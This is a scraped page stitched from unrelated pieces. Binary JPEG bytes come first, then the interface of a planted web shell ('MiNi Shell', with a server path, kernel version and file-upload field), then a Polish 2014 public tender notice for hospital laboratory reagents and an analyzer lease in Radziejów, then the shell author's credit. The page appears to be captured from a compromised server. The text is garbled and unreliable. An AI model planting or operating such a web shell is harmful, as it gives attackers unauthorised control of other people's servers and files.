JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141126/388138-N-2014.html

<p class="kh_header"><b>Radziejów: Dostawa odczynników do badań biochemicznych wraz z dzierżawą analizatora i systemu monitoringu temperatur - oznaczenie sprawy PN 23/2014</b><br>
<b>Numer ogłoszenia: 388138 - 2014; data zamieszczenia: 26.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład  Opieki Zdrowotnej , ul. Szpitalna 3, 88-200 Radziejów, woj. kujawsko-pomorskie, tel. 054 2853631, faks 054 2853701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szptalradziejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników do badań biochemicznych wraz z dzierżawą analizatora i systemu monitoringu temperatur - oznaczenie sprawy PN 23/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  	Wykonawca w ramach zamówienia przyjmuje do wykonania dostawę odczynników do 	badań biochemicznych wraz z dzierżawą analizatora i systemu monitoringu temperatur. Jest wskazane aby do wersji papierowej oferty załączono również wersję 	elektroniczną formularza asortymentowo cenowego - załącznik nr 2 siwz na dowolnym nośniku.    
2. Wykonawca zobowiązany jest zaoferować przedmiot zamówienia  zgodnie z 	zapotrzebowaniem na odczynniki do automatycznego analizatora biochemicznego, 	opisanym w załączniku nr  - załącznik nr 2 do siwz oraz warunkami granicznymi analizatora 	biochemicznego kompatybilnego odczynnikowo z analizatorem Konelab 20 ISE - opisanych w załączniku nr 3 do siwz. Dopuszcza się składanie ofert równoważnych. Przez oferty 	równoważne należy rozumieć przedmiot  zamówienia o parametrach nie gorszych niż opisane  w  załącznik nr 2 do siwz załączniku nr 3 do siwz.    

3.Zamawiający wymaga aby przedmiot zamówienia posiadał poniższe dokumenty 	dopuszczające:
1) Certyfikat  zgodności CE . 
2) Opisaną metodykę wykonywania badań w jęz. polskim
3) Dokumenty potwierdzające dopuszczenie przedmiotu zamówienia do obrotu i używania 	zgodnie z obowiązującymi na terenie RP  przepisami prawa.  
4. Wykonawca zobowiązany jest dostarczyć dokumenty o których mowa w pkt. 3.  
5. Wykonawca zaakceptuje realizację przedmiotu zamówienia na warunkach określonych we wzorze  umowy stanowiącym  załączniki nr 8 . 
6.Dostawy będą realizowane sukcesywnie, w trakcie trwania umowy na koszt i ryzyko Wykonawcy  do miejsca wskazanego przez Zamawiającego, na podstawie odrębnych zamówień składanych przez Zamawiającego, w terminie max. 3 dni roboczych licząc od momentu złożenia zamówienia.
7. Miejsce realizacji zamówienia:   Laboratorium Analityczne  w godzinach 8:30 -14:00.
8. Termin płatności wynosi 30 dni licząc od daty wykonania zamówienia i doręczenia 	Zamawiającemu faktury.   
9.  Okres stałości ceny  - przez cały  okres obowiązywania umowy, z zastrzeżeniem zapisów zawartych w załączniku nr 8  do siwz.
10. Opis części zamówienia.
1)  Zamawiający nie dopuszcza możliwość składania ofert częściowych.  
11. Informacja dotycząca ofert wariantowych.
1) Zamawiający nie dopuszcza składania ofert wariantowych w rozumieniu art. 83 Pzp.
12. Informacja o przewidywanych zamówieniach uzupełniających.
1) Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust.1 	pkt. 6 i 7 Pzp.
13. Informacja na temat zastosowania aukcji elektronicznej.
1) Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
 14. 	Informacja na temat umowy ramowej.
1) Zamawiający nie zamierza zawrzeć umowy ramowej.

15. 	Informacja na temat ustanowienia  dynamicznego systemu zakupów.
	1) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.   

16.  Zamawiający informuje, że dopuszcza możliwość wykonania części zamówienia przez 	podwykonawców. W związku z powyższym Wykonawca w przypadku planowanego 	powierzenia realizacji części zamówienia podwykonawcom zobowiązany jest podać                           	w oświadczeniu   Wykonawcy o zakresie dostaw zleconych do wykonania podwykonawcom (zał. nr 6 	do siwz) zakres przewidzianych do wykonania przez nich części zamówienia. W przypadku 	powierzenia wykonania części przedmiotu zamówienia podwykonawcom, Wykonawca ponosi 	odpowiedzialność za działania podwykonawców jak za własne. 

17. 	Zamawiający nie przewiduje zebrania Wykonawców. 

18.  	Zamawiający nie przewiduje udzielania zaliczek..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego warunku Wykonawca zobowiązany jest załączyć: a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno oświadczenie podpisane przez pełnomocnika Wykonawców ubiegających się o udzielenie zamówienia). Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych dokumentów formułą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego warunku Wykonawca zobowiązany jest załączyć: a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno oświadczenie podpisane przez pełnomocnika Wykonawców ubiegających się o udzielenie zamówienia). Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych dokumentów formułą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego warunku Wykonawca zobowiązany jest załączyć: a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno oświadczenie podpisane przez pełnomocnika Wykonawców ubiegających się o udzielenie zamówienia). Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych dokumentów formułą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego warunku Wykonawca zobowiązany jest załączyć: a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno oświadczenie podpisane przez pełnomocnika Wykonawców ubiegających się o udzielenie zamówienia). Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych dokumentów formułą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie przedmiotowego warunku Wykonawca zobowiązany jest załączyć: a) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Pzp wg wzoru stanowiącego załącznik nr 4 do siwz.W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno oświadczenie podpisane przez pełnomocnika Wykonawców ubiegających się o udzielenie zamówienia). Ocena spełnienia warunków udziału w postępowaniu dokonana będzie na podstawie analizy dostarczonych dokumentów formułą spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz oferty załącznik nr 1  do siwz. 
2. Wypełniony i podpisany formularz  zapotrzebowanie na odczynniki do automatycznego analizatora biochemicznego  załącznik nr 2 do siwz.
3. Wypełniony i podpisany formularz warunków granicznych analizatora biochemicznego kompatybilnego odczynnikowo z analizatorem Konelab 20 ISE.
4. Oświadczenie o spełnieniu warunków udziału w postępowaniu  załącznik nr 4 do siwz.
5. Oświadczenie o braku podstaw do wykluczenia z postępowania załącznik nr 5 do siwz. 
6.	Wykaz podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, ze nie należy do grupy kapitałowej ( załącznik nr 6 do siwz).
7. Wykaz  części   zamówienia  załącznik nr 7 do siwz.
8.W celu wskazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust.1 Pzp, Zamawiający żąda złożenia:
1) aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wskazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt.2 Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy  z Wykonawców składa je oddzielnie, 
2) aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia , że uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z Wykonawców składa je oddzielnie,
3) aktualnego zaświadczenia właściwego Oddziału Zakładu Ubezpieczeń 	Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że 	Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub 	potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - 	wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo składania ofert . 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z  Wykonawców składa je oddzielnie.
9.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 7 ppkt 1), 2), 3)  składa odpowiedni dokument 	lub 	dokumenty, określone w § 4  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r w 	sprawie rodzajów dokumentów jakich, może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  Dz. U. z 2013 r. poz. 231 . , wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio: nie otwarto jego likwidacji ani nie ogłoszono jego upadłości, nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,   	 
1)jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce  zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zstępuje się je 	dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania,
10.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust.1 Pzp.
Wtedy zobowiązani są załączyć do oferty dokument  pismo, oświadczenie wskazujący ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  dotyczy również spółek cywilnych utworzonych przez osoby fizyczne - zamiast tego dokumentu może być załączona umowa spółki cywilnej , uchwała wspólników. 	Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany, przez prawnie upoważnionych przedstawicieli wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Do dnia podpisania umowy z Zamawiającym podmioty występujące wspólnie, których 	oferta została wybrana, jako najkorzystniejsza, muszą podpisać umowę o współdziałaniu podmiotu 	wspólnego ( dla spółek cywilnych utworzonych przez osoby fizyczne może to być umowa spółki cywilnej, uchwała wspólników). Umowa nie może być zawarta na czas krótszy, niż okres realizacji 	umowy z Zamawiającym. Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem. Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na 	Wykonawcę  w miejscu  nazwa i adres Wykonawcy należy wpisać dane wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienia, a nie tylko dane pełnomocnika. Zgodnie z art. 	141 Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarna 	odpowiedzialność za wykonanie umowy.
11.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia nie spełnia, w oparciu o informacje zawarte w wymaganych oświadczeniach i dokumentach.     
12.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Parametry techniczne - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wykonawca gwarantuje stałość cen na dostawę i sprzedaż materiału przez okres obowiązywania umowy.
2. Strony dopuszczają obniżenie cen z przyczyn leżących po stronie producenta lub Wykonawcy (np. okresowe ceny promocyjne).
3. Zamawiający dopuszcza możliwość dostarczania przez Wykonawcę, po uprzednim wykazaniu przez Wykonawcę zajścia szczególnych okoliczności (np. wstrzymanie lub zakończenie produkcji) oraz wyrażeniu zgody przez Zamawiającego, odpowiedników materiałów objętych umową, o parametrach nie gorszych niż materiały objęte umową, w cenach rynkowych nie wyższych jednak niż ustalone w wyniku postępowania przetargowego.
4.Zamawiający dopuszcza możliwość przedłużenia czasu trwania umowy, nie dłużej niż o jedną szóstą okresu jej trwania, w przypadku nie zrealizowania przedmiotu umowy w całości w okresie określonym w umowie.
5. Zamawiający zastrzega sobie, w ramach przedmiotu umowy, prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw jednego asortymentu, kosztem odpowiedniego wartościowo zmniejszenia dostaw innego asortymentu (w stosunku do wielkości określonych w formularzu cenowym) przy niezmienionej całkowitej wartości przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalradziejow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Administracji i Zamówień Publicznych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej , ul. Szpitalna 3, 88-200 Radziejów - lokal nr 2-102 pierwsze piętro budynek administracji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2014 godzina 12:45, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Szpitalna 3, 88-200 Radziejów - lokal 2-100 sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com